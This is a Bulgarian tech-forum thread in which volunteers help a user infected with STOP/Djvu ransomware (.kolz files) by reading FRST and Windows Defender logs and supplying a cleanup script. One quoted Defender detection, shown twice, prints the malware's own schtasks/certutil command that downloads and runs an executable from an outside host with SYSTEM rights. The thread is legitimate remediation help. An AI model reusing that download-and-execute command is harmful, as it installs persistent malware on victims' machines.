Хвана ме много лошо този вирус как да го премахна, много сте готини от Калдата Благодаря ви ! 

Следваш стъпките от тази тема и чакаш търпеливо някой от специлистите да даде точни инструкции. Не се опитвай сам да решиш проблема, защото така затрудняваш персонала.

https://www.kaldata.com/forums/topic/132819-системата-ми-е-инфектирана-какво-да-правя-сега/

Моля само хора които могат да помогнат безплатно и бързо!Благодаря! 

 

А ти прочете ли каквои е написал @Eclipse2G?
Видя ли инструкциите, написани от вирусоборец и по кото работят специалистите, обслужващи раздела?

Не четеш другарю Седларов, това е раздел за помощ в борбата срещу вирусите, специалистите в областта НЕ СА ясновидци, а в повечето случаи се налага да пишат код който е специално за съответната машина и може да бъде вреден за всяка друга.
Как точно предлагаш да ти се помогне при това положение?

Виж горе линка дето ти го е дал колегата и следвай стъпките, ако ли не : https://sanovnik.bg/forum/f-50-yasnovidstvo

Ето начини за премахване: https://www.google.bg/search?q=Kolz+вирус&hl=bg

И от първия резултат, евентуално може да пробваш decryptor, но е малко вероятно да можеш да си възстановиш информацията: https://howtofix.guide/kolz-virus/

Ако нямаш архив, най-вероятно ще я загубиш.

 

Бас ловя, че това е поредното разширение на STOP Djvu Ransomware. Декриптор за новите варианти няма (особено ако същите използват онлайн ключ за криптиране, вместо офлайн такъв). Премахването на заразата обикновено е лесна задача, но е добре да почнете да се настройвате психически, че ако нямате бекъп на различни външни носители с данните ви е свършено малко или много.

Ok

Addition.txt FRST.txt

Здравейте,

Утре ще напиша скрипт за почистване. Има остатъци, които е добре да премахнем:

Цитат

 

HKU\S-1-5-21-3869048764-3273615316-3993963304-1001\...\Run: [keghwoka] => "C:\Users\HP xw4600\gibmtbpf.exe"

HKU\S-1-5-21-3869048764-3273615316-3993963304-1001\...\StartupApproved\Run: => "keghwoka"

2020-09-22 13:49 - 2020-09-22 13:55 - 000000000 ____D C:\Users\HP xw4600\AppData\LocalLow\IGDump
2020-09-22 13:42 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Roaming\cwj0pon50yl
2020-09-22 13:38 - 2020-09-22 13:38 - 000001111 _____ C:\Users\HP xw4600\_readme.txt
2020-09-22 13:38 - 2020-09-22 13:37 - 000196608 _____ C:\Users\HP xw4600\AppData\LocalLow\xrpMCARCr4
2020-09-22 13:38 - 2020-09-22 13:37 - 000196608 _____ C:\Users\HP xw4600\AppData\LocalLow\exuieaoEiI
2020-09-22 13:38 - 2020-09-22 13:36 - 000425984 _____ C:\Users\HP xw4600\AppData\LocalLow\JBdT3hVOfo
2020-09-22 13:38 - 2020-09-22 13:36 - 000425984 _____ C:\Users\HP xw4600\AppData\LocalLow\aMeAjSWfch
2020-09-22 13:38 - 2020-07-26 16:40 - 000069632 _____ C:\Users\HP xw4600\AppData\LocalLow\ZMrF6cI6NX
2020-09-22 13:38 - 2020-07-26 16:40 - 000069632 _____ C:\Users\HP xw4600\AppData\LocalLow\8DYdD3ojxS
2020-09-22 13:38 - 2020-06-30 08:28 - 000163840 _____ C:\Users\HP xw4600\AppData\LocalLow\x3CF3EDNhm
2020-09-22 13:38 - 2020-06-30 08:28 - 000163840 _____ C:\Users\HP xw4600\AppData\LocalLow\bbSqWy6yhK
2020-09-22 13:38 - 2020-06-30 08:28 - 000073728 _____ C:\Users\HP xw4600\AppData\LocalLow\zdGc81tBDK
2020-09-22 13:38 - 2020-06-30 08:28 - 000073728 _____ C:\Users\HP xw4600\AppData\LocalLow\gxIX4a2dRE
2020-09-22 13:38 - 2019-08-04 21:05 - 000065536 _____ C:\Users\HP xw4600\AppData\LocalLow\IDCdJOyapn
2020-09-22 13:38 - 2019-08-04 21:05 - 000065536 _____ C:\Users\HP xw4600\AppData\LocalLow\3soLBPh71Y
2020-09-22 13:36 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f
2020-09-22 13:36 - 2020-09-22 14:06 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\2bbc358c-aa86-4857-bac0-1a8d30e61af5
2020-09-22 13:36 - 2020-09-22 13:43 - 012384590 _____ C:\Users\HP xw4600\gibmtbpf.exe.kolz
2020-09-22 13:36 - 2020-09-22 13:38 - 000000000 ____D C:\ProgramData\t5v5u9q3q6u5y1s1
2020-09-22 13:36 - 2020-09-22 13:38 - 000000000 ____D C:\ProgramData\HVG53LKK6HBIDYVX56WB2MUPW
2020-09-22 13:36 - 2020-09-22 13:36 - 000916735 _____ (SQLite Development Team) C:\Users\HP xw4600\AppData\LocalLow\sqlite3.dll
2020-09-22 13:36 - 2020-09-22 13:36 - 000000555 _____ C:\Users\HP xw4600\AppData\Local\bowsakkdestx.txt
2020-09-22 13:36 - 2020-09-22 13:36 - 000000000 ____D C:\SystemID
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ___HD C:\WINDOWS\rss
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Roaming\ibkccjksq22
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ____D C:\Program Files\L8P5QHJ8VR
2020-09-22 13:35 - 2020-09-22 14:06 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\ScrSnap
2020-09-22 13:34 - 2020-09-22 14:08 - 000000000 ____D C:\Program Files (x86)\PAOw
2019-12-07 12:08 - 2019-12-07 12:08 - 000320202 ___SH () C:\Users\HP xw4600\AppData\Roaming\cwieerh

Error: (09/22/2020 02:04:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: F047.exe, version: 1.0.0.1, time stamp: 0x5d890137
Faulting module name: F047.exe, version: 1.0.0.1, time stamp: 0x5d890137
Exception code: 0xc0000005
Fault offset: 0x0137488a
Faulting process id: 0x9a8
Faulting application start time: 0x01d690cd112bd8f4
Faulting application path: C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f\F047.exe
Faulting module path: C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f\F047.exe
Report Id: 4c02a9df-55d8-4bd5-b90a-24351d17a141
Faulting package full name:
Faulting package-relative application ID:

Windows Defender:
===================================
Date: 2020-09-22 13:38:07.6700000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bulta!rfn&threatid=2147694403&enterprise=0
Name: Trojan:Win32/Bulta!rfn
ID: 2147694403
Severity: Severe
Category: Trojan
Path: process:_pid:8044,ProcessStart:132452445989568289
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F99.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:19.8330000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Glupteba&threatid=2147718257&enterprise=0
Name: Trojan:Win32/Glupteba
ID: 2147718257
Severity: Severe
Category: Trojan
Path: process:_pid:1980,ProcessStart:132452445830796454
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F047.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:17.0260000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:11.3390000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fareit.V!MTB&threatid=2147743811&enterprise=0
Name: Trojan:Win32/Fareit.V!MTB
ID: 2147743811
Severity: Severe
Category: Trojan
Path: file:_C:\Users\HP xw4600\AppData\Local\2bbc358c-aa86-4857-bac0-1a8d30e61af5\updatewin2.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F047.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Съдейки по следния файл обаче:

C:\Users\HP xw4600\AppData\Local\bowsakkdestx.txt

става ясно, че става въпрос за STOP DJVU Ransomware.

преди 12 часа, B-boy/StyLe/ написа:

Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F

Сори за офтопика ама не се сдържах   Как хубаво ползва LOL's ...

Искам само да попитам автора как се е заразил с това.

Какво стана със скрипта? Заразих се като свалих и инсталирах една програма която се оказа вирус ама вече късно. Слагат имена на известни програми на инсталиращите пакети и веднъж пуснеш ли я,край.

Ами забавих се, защото имах лични ангажименти. Все пак форума ми е само хоби.

 

Изтеглете fixlist.txt и го запазете в папката, където сте свалили FRST64.exe (на десктопа)

Стартирайте FRST64.exe и натиснете бутона Fix веднъж!

След като приключи, ако ви поиска рестарт - съгласете се. След рестарта публикувайте лог файла - Fixlog.txt, който ще се създаде след работата на програмата.

Внимание: Скрипта е създаден за текущата система. Да не се ползва за други системи с подобни проблеми!

Това е засега.

Поздрави!

Вички фаилове на компютърът ми завършват със .kolz и са блокирани,немогат да се отворят.

Fixlog.txt

Ами за тях няма какво да се направи. Както казах, криптираните файлове не можем да ги възстановим, а само да ги изтрием. Можем само да почистим заразата, както и направихме. Не вярвам авторите на криптиращия вирус да са включили системни файлове да бъдат криптирани, защото това би сринало работата на Windows, а те нямат файда от това, защото ако жертвата реши да си плати откупа няма да успее. Но ако има такива файлове, то тогава може би по-лесно би било да форматирате и преинсталирате. И в двата случая няма да си върнете файловете и ще се отървете от заразата, но поне след преинсталацията системата ви ще работи нормално (ако сега ви създава проблеми). Изборът оставям на вас. Само ме информирайте за да знам дали да продължаваме с почистващия процес.

Между другото прикачения Fixlog.txt не върши особена работа, защото сте стартирали скрипта два пъти и първия Fixlog.txt се е презаписал и затова в новия лог показва, че търсените елементи не са били намерени.

Ran by HP xw4600 (24-09-2020 08:19:51) Run:2

Иначе ако решите да изтриете файловете с разширението *.kolz стартирайте следния bat файл с десен бутон и Run as administrators

del.bat